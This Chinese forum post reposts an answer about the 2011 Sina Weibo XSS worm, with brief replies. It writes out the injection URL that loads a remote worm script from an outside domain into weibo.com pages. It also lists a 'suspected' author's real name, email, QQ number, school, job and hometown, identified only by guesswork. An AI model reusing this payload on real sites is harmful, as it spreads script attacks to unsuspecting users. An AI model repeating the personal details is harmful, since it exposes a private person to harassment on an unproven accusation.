关于昨天新浪微博漏洞的一些信息

灵岩山下zgw

刚才看了一个大家讨论昨天微博出事的帖子，感觉大家对这个很感兴趣，于是就把这个东西贴到这里来了，不知道发在这个区是否合适……这是知乎用户duck_1984在“新浪微博出现类似病毒爆发的情况，是怎么回事？”这个问题中的回答（源地址：http://www.zhihu.com/question/19739025?rf=19739033）：

脚本 http://www.2kt.cn/images/t.js

XSS代码：weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update

新浪名人堂部分XSS过滤不严

攻击原理分析：http://d.pr/Flsl
源 .js 文件内容：http://d.pr/rHiB  （海均提供）

========================================

病毒作者微博 http://weibo.com/n/hellosamy （已河蟹）
遗照 http://oi52.tinypic.com/zjc5s4.jpg

Domain Name: 2kt.cn
Registrant Organization: 北京新网数码信息技术有限公司
Registrant Name: 张志
Administrative Email: lin5061@gmail.com

疑似病毒作者信息：
I D名：lin5-61
真实姓名：朝森
性别：男
毕业院校及专业：武汉科技大学
职业：写代码（JAVA）
联系方式：QQ46142932

QQ空间： http://user.qzone.qq.com/46142932
问题：我是哪里人？
回答：海南。


全部内容就是这样，也许会对一些高手们的研究有帮助吧。另外，这里还有一个分析这个事件的链接，也可以作为参考：http://www.oschina.net/news/19236/sina-weibo-xss

里奥

已经知道了

maomao110

里奥 发表于 2011-6-29 20:49
已经知道了

对  昨天晚上就知道了

62998511

哇塞。。。太强了